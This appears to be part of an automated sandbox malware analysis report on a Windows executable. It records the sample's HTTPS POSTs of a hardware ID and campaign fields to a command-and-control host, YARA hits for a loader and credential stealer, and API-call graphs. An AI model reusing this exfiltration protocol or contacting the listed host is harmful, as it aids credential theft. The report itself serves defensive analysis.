              1 | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:07 UTC | 265 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 54
              Host: outpointsozp.shop
              2024-07-27 09:25:07 UTC | 54 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 65 64 66 62 4d 45 2d 2d 72 65 76 65 72 73 65 70 72 6f 78 79 26 6a 3d
              Data Ascii: act=recive_message&ver=4.0&lid=edfbME--reverseproxy&j=
              2024-07-27 09:25:07 UTC | 802 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:07 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=qk7goj2pskjqhk41je7ffgrvh3; expires=Wed, 20-Nov-2024 03:11:46 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv6jlZ6xdvK0Z7vigCpQMbz5X0J4xJGTLNV5byMIy1dkdbWbiI%2Bxxzn7sgRF9ekGXuf0Z9UdDl2QaO4Yvw5vC8zqDEi0RtOFMQ0YS8KUsUXlEQHN7jXg%2BAfeUHLluXDqUYI0AA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94912c3d43f9-EWR
              alt-svc: h3=":443"; ma=86400


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.4 | 49733 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:08 UTC | 283 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 18170
              Host: outpointsozp.shop
              2024-07-27 09:25:08 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:09 UTC | 804 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:08 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=nstvbnd79ourvs8ij3rau3gp1h; expires=Wed, 20-Nov-2024 03:11:47 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJPFeF3fqLDn%2FvpCJ4YyKz28ZLlropE8T77%2BdCkDZuonovirl156vQvQehqWUnX9clwsFWiTqQ094pK6IqY46M5iWMDV6mhpRlSB%2BJdkgJjD51JDz84yjfBBL2nmecWvcCUqog%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b9498aa12c330-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:09 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:10 UTC | 282 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 8791
              Host: outpointsozp.shop
              2024-07-27 09:25:10 UTC | 8791 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:11 UTC | 804 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=8c6t1i5c24t2odtho2ba89n4mu; expires=Wed, 20-Nov-2024 03:11:49 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ez1ereIwbiVpIHsLiO7S%2B7M433iSFXTFTyXXVZlQSDmtXvVAq6V1mM5FGVlbBgYhLAicvLyQRlNy74MvLwU9dAupK3cPg9TYd2JSp5C6u05Kqg1cmsVlqrI6v%2F9nnefaPoF%2B7A%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94a33d467d16-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:11 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.4 | 49735 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:11 UTC | 283 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 20444
              Host: outpointsozp.shop
              2024-07-27 09:25:11 UTC | 15331 | OUT | Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:12 UTC | 802 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=jrc4j32tj4h88jl6e61q5atjml; expires=Wed, 20-Nov-2024 03:11:51 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZlEJeKQLqMipv23yjKcYOqv5axaG9klQ0M2Qe6uyCuwvsvYCqyhuwcZs46KZFJ0UFh%2FAeQwgoiwXRCW0KLgHrqR%2Btkds8Jvq59p1fnCX4jQTn9Ha9NOatn9BER7Pw3encfhlA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94accc964394-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:12 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:12 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | 6820 | C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:25:13 UTC | 282 | OUT | POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 1283
              Host: outpointsozp.shop
              2024-07-27 09:25:13 UTC1283OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:13 UTC  808  IN  HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=d0mjiu0u256kjhpi827h53jgcf; expires=Wed, 20-Nov-2024 03:11:52 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qJHGj51SeXFyHRXoa671hML9MT4RKdl%2FI1YDNNa4DFWszCAQlbc3H7lFO%2BQwo9p7h1mOB3oqEECrwNo540RP%2BsK5DbRjPcFzoojO4VSSpsivIox5R9i8izy96XdRb7P%2Bo%2B0RZA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94b52fa742df-EWR
              alt-svc: h3=":443"; ma=86400
              2024-07-27 09:25:13 UTC  19  IN  Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
              Data Ascii: eok 8.46.123.33
              2024-07-27 09:25:13 UTC  5  IN  Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
              6  192.168.2.4  49737  188.114.97.3  443  6820  C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Timestamp  Bytes transferred  Direction  Data
              2024-07-27 09:25:14 UTC  284  OUT  POST /api HTTP/1.1
              Connection: Keep-Alive
              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
              Content-Length: 573113
              Host: outpointsozp.shop
              2024-07-27 09:25:14 UTC  15331  OUT  Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 32 45 41 36 36 38 30 45 31 34 38 32 41 39 33 43 35 45 32 38 42 42 32 35 32 30 37 36 31 30 44 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 64 66 62 4d 45 2d 2d 72 65 76 65 72
              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"72EA6680E1482A93C5E28BB25207610D--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"edfbME--rever
              2024-07-27 09:25:16 UTC  804  IN  HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:25:16 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=84l1sh2ds9piv5gloc0gq3g3ss; expires=Wed, 20-Nov-2024 03:11:54 GMT; Max-Age=9999999; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI0nw5lbXu6f%2Bo50nkyeP0RjeJi1n%2Bzej7XjhaLST883taimGZB3ITigAPGkNhEY1qXO%2BQ0s1gprMvpxmHcc9eXZSqxxQJGJj7Cs4ekZMqnFAnZXrjHg0f5UAHB9ujTzDQIWlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8a9b94be794a41f5-EWR
              alt-svc: h3=":443"; ma=86400



              Target ID:0
              Start time:05:24:58
              Start date:27/07/2024
              Path:C:\Users\user\Desktop\rwsNDpQSKZ.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\rwsNDpQSKZ.exe"
              Imagebase:0xc50000
              File size:2'362'184 bytes
              MD5 hash:35E69F7B1869D8E9CF4270B6EC33EF41
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1838828037.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789398984.0000000003062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789467851.0000000003078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1789281360.0000000003060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:true

                Execution Graph

                Execution Coverage:0%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:100%
                Total number of Nodes:9
                Total number of Limit Nodes:1
                execution_graph 60450 c9ba60 60451 c9ba3d 60450->60451 60451->60450 60452 c9ba8f 60451->60452 60453 c9c028 GetModuleHandleA 60452->60453 60454 c9c057 60453->60454 60455 c9c94c GetProcAddress 60454->60455 60456 c9c965 60455->60456 60457 c9cf2c VirtualAlloc 60456->60457 60458 c9cf75 60457->60458

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 c9b9c0-c9b9ce 1 c9b969-c9b98d ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z call ce5347 0->1 2 c9b9d0-c9b9d1 0->2 4 c9b9d3 2->4 5 c9b9d5-c9b9dd 2->5 4->5 6 c9b9e2-c9ba20 call cf27eb 5->6 12 c9ba22-c9ba31 6->12 13 c9ba38 12->13 14 c9ba33 call c58eb3 12->14 16 c9ba3d-c9ba8d call cdd2a7 13->16 14->13 20 c9ba8f-c9d34f call c5d1e4 call c98603 call d02ced call ce2fe2 call c58eb3 call cf4fba call c513fe call ca0433 call c98903 call c880ce call c55a77 call cbe4c9 call c645eb call ced256 call c536d6 call c7435e call cb2549 call caff82 call cc2e4d call ca8ff5 call cafd55 call c71e7e call c56397 call ca2abf call c82905 call cf2db7 call c8de89 call cf4462 call d00a3d call c56138 call c7fca0 call c96b88 call c71cf4 call c6cbe4 call ccd5d9 call cbd49a call c98603 call c9e0da call c617a8 call c6fcdd call ce6986 call cd5bdc call cb3f5c call c880ce call ccb75b call c5858c call cae9fb call c75c15 call c89cc9 call c7baa0 call cb0492 call c6a146 call c9b8b5 call c77a74 call c8b742 call cc2f48 call c9ea6b call ce07e7 call ce71c7 call d0050f GetModuleHandleA call cf0051 call c654c2 call d01dac call ca281b call cb44c0 call c7c1b1 call c82905 * 2 call cbbafb call cd93a6 call c7fca0 call c748fe call cb140b call cbf3ba call c599ce call c771ae call cf6022 call c96b88 call cfa2f2 call c92c6f call cd39d4 call c75847 call c936be call c74f92 call cbff87 call c96b88 call cf938f call cbbafb call cc7cee call c66289 call cc632e call cd9bdd call ca3469 call c593e8 call c7ac89 call cc34e6 call c6614b call cfd3ea call c84ef8 call c6f6b4 call cf0d04 call ca0433 call cf7b05 call c7f5a0 call cf679c call cf4880 call c63766 call ce5cfd call c880ce call c64904 call c6667d call c64904 call c90022 call ca5922 call cdded5 call c536d6 call c93c22 call d031e4 call c5a856 call cc46d9 call c96b88 call ce9b8b call ca281b call c66a44 call c6f4c4 call ca7071 call c699b4 call c5d90e call cbe4c9 call c84ef8 call c73b9e call 
c78f79 call cf0d04 call c5d90e call c55db5 call c880ce call cba471 GetProcAddress call ce595d call c9e0da call cab45b call cae9fb call ce6801 call c6bfdb call cb15b6 call cb96ee call cb65ba call c9b8b5 call caa790 call ccf0c5 call c98603 call cec096 call caf567 call c5cb88 call cba5e2 call cd0991 call c5cdc9 call ce337c call d00ac0 call cd20c8 call d069f5 call c9b8b5 call cf1b65 call c82905 call ccc747 call ccc50b call cc52e1 call c526b4 call c5aa14 call caa713 call cb6326 call c6fde2 call c5e338 call c90022 call cde5fd call d03554 call c7baa0 call cc42b7 call c9e0da call c587df call ceaf14 call cad793 call c63e17 call cf7698 call c57b40 call cb6dc1 call cd0ebc call cc0993 call cb8cb4 call cd19a9 call c78123 call cc46d9 call c7c1b1 call cae29f call d014a5 VirtualAlloc call cf97f5 call cfe1b6 call c9b8b5 call cadbfa call cbf3ba call ce930e call c73a14 call cb68b6 call cd4f8d call cb3a53 call c73a74 call d049a2 call cfee16 call cb774c call ca3fa1 call c650c8 call c62534 call ce2bae call cb140b call ce7176 call cb68b6 call ccc50b call cc2061 call ce9927 call c6755e call ccc747 call c6d508 call cd4f8d call ce5d27 call cb5e76 call cf16ed call cda356 call cec73a 16->20
                APIs
                • ?SetInt64@CCmmArchiveVarivant@Cmm@@QAEX_J@Z.RWSNDPQSKZ(00000000,00000000,?,-00000004,?,00000040,00C860BC), ref: 00C9B979
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,00000000,00000000,?,-00000004,?,00000040,00C860BC), ref: 00C9B981
                • GetModuleHandleA.KERNEL32(?,?,-18944A80,B1A51CAF,00CB00B3,?,00D3CE14,?,?,00CB0FD4,00000000,?,?,00CA8C62,00000000,00000001), ref: 00C9C04C
                • GetProcAddress.KERNEL32(00000000), ref: 00C9C95A
                • VirtualAlloc.KERNEL32(-01A30A38,0004F80C,-0000000166D1C596,-3FAF5AAB), ref: 00C9CF4F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ArchiveCmm@@$AddressAllocAppendArchive@Child@HandleInt64@ModuleNode@ProcTreeV123@@Varivant@Virtual
                • String ID: VgMe
                • API String ID: 3780256328-4206229080
                • Opcode ID: 32561bd35c48385c834120545eca3fbc18d543ae5aed9fef51e371683ab8050c
                • Instruction ID: 7ad37c40af9ccfb3ca839767cfc27baa1316768c31dee281b74c1660e8836ba6
                • Opcode Fuzzy Hash: 32561bd35c48385c834120545eca3fbc18d543ae5aed9fef51e371683ab8050c
                • Instruction Fuzzy Hash: 15C25477D143254B8758EFB5AC4607E3652FFC2314382D23EE902CB666CF38454AE6A6

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 475 c9ba60-c9ba6f 476 c9ba75-c9ba8d call cdd2a7 475->476 478 c9ba3d-c9ba5e 476->478 479 c9ba8f-c9c95a call c5d1e4 call c98603 call d02ced call ce2fe2 call c58eb3 call cf4fba call c513fe call ca0433 call c98903 call c880ce call c55a77 call cbe4c9 call c645eb call ced256 call c536d6 call c7435e call cb2549 call caff82 call cc2e4d call ca8ff5 call cafd55 call c71e7e call c56397 call ca2abf call c82905 call cf2db7 call c8de89 call cf4462 call d00a3d call c56138 call c7fca0 call c96b88 call c71cf4 call c6cbe4 call ccd5d9 call cbd49a call c98603 call c9e0da call c617a8 call c6fcdd call ce6986 call cd5bdc call cb3f5c call c880ce call ccb75b call c5858c call cae9fb call c75c15 call c89cc9 call c7baa0 call cb0492 call c6a146 call c9b8b5 call c77a74 call c8b742 call cc2f48 call c9ea6b call ce07e7 call ce71c7 call d0050f GetModuleHandleA call cf0051 call c654c2 call d01dac call ca281b call cb44c0 call c7c1b1 call c82905 * 2 call cbbafb call cd93a6 call c7fca0 call c748fe call cb140b call cbf3ba call c599ce call c771ae call cf6022 call c96b88 call cfa2f2 call c92c6f call cd39d4 call c75847 call c936be call c74f92 call cbff87 call c96b88 call cf938f call cbbafb call cc7cee call c66289 call cc632e call cd9bdd call ca3469 call c593e8 call c7ac89 call cc34e6 call c6614b call cfd3ea call c84ef8 call c6f6b4 call cf0d04 call ca0433 call cf7b05 call c7f5a0 call cf679c call cf4880 call c63766 call ce5cfd call c880ce call c64904 call c6667d call c64904 call c90022 call ca5922 call cdded5 call c536d6 call c93c22 call d031e4 call c5a856 call cc46d9 call c96b88 call ce9b8b call ca281b call c66a44 call c6f4c4 call ca7071 call c699b4 call c5d90e call cbe4c9 call c84ef8 call c73b9e call c78f79 call cf0d04 call c5d90e call c55db5 call c880ce call cba471 GetProcAddress 476->479 478->475 754 c9c960-c9cf27 call ce595d call c9e0da call cab45b call cae9fb call ce6801 call c6bfdb call cb15b6 call cb96ee call cb65ba call c9b8b5 call caa790 call ccf0c5 call c98603 
call cec096 call caf567 call c5cb88 call cba5e2 call cd0991 call c5cdc9 call ce337c call d00ac0 call cd20c8 call d069f5 call c9b8b5 call cf1b65 call c82905 call ccc747 call ccc50b call cc52e1 call c526b4 call c5aa14 call caa713 call cb6326 call c6fde2 call c5e338 call c90022 call cde5fd call d03554 call c7baa0 call cc42b7 call c9e0da call c587df call ceaf14 call cad793 call c63e17 call cf7698 call c57b40 call cb6dc1 call cd0ebc call cc0993 call cb8cb4 call cd19a9 call c78123 call cc46d9 call c7c1b1 call cae29f call d014a5 479->754 867 c9cf2c-c9cf70 VirtualAlloc call cf97f5 754->867 869 c9cf75-c9d292 call cfe1b6 call c9b8b5 call cadbfa call cbf3ba call ce930e call c73a14 call cb68b6 call cd4f8d call cb3a53 call c73a74 call d049a2 call cfee16 call cb774c call ca3fa1 call c650c8 call c62534 call ce2bae call cb140b call ce7176 call cb68b6 call ccc50b call cc2061 call ce9927 call c6755e call ccc747 call c6d508 call cd4f8d 867->869 923 c9d297-c9d2b0 call ce5d27 869->923 925 c9d2b5-c9d34f call cb5e76 call cf16ed call cda356 call cec73a 923->925
                APIs
                • GetModuleHandleA.KERNEL32(?,?,-18944A80,B1A51CAF,00CB00B3,?,00D3CE14,?,?,00CB0FD4,00000000,?,?,00CA8C62,00000000,00000001), ref: 00C9C04C
                • GetProcAddress.KERNEL32(00000000), ref: 00C9C95A
                • VirtualAlloc.KERNEL32(-01A30A38,0004F80C,-0000000166D1C596,-3FAF5AAB), ref: 00C9CF4F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: AddressAllocHandleModuleProcVirtual
                • String ID: VgMe
                • API String ID: 3695083113-4206229080
                • Opcode ID: b96f376e3c5e72d3016ff8287a0c2fb73147e576708d29770e8161bb1dfca229
                • Instruction ID: 5c9657955bc05174463dc012e4ebc441b49fab407aa3d270106b9fae6326b864
                • Opcode Fuzzy Hash: b96f376e3c5e72d3016ff8287a0c2fb73147e576708d29770e8161bb1dfca229
                • Instruction Fuzzy Hash: ABB24277D143254B8358EFB5AC4607E3652FFC2314386D23EE902CB666CF38454AE6A6

                Control-flow Graph

                • Executed
                • Not Executed
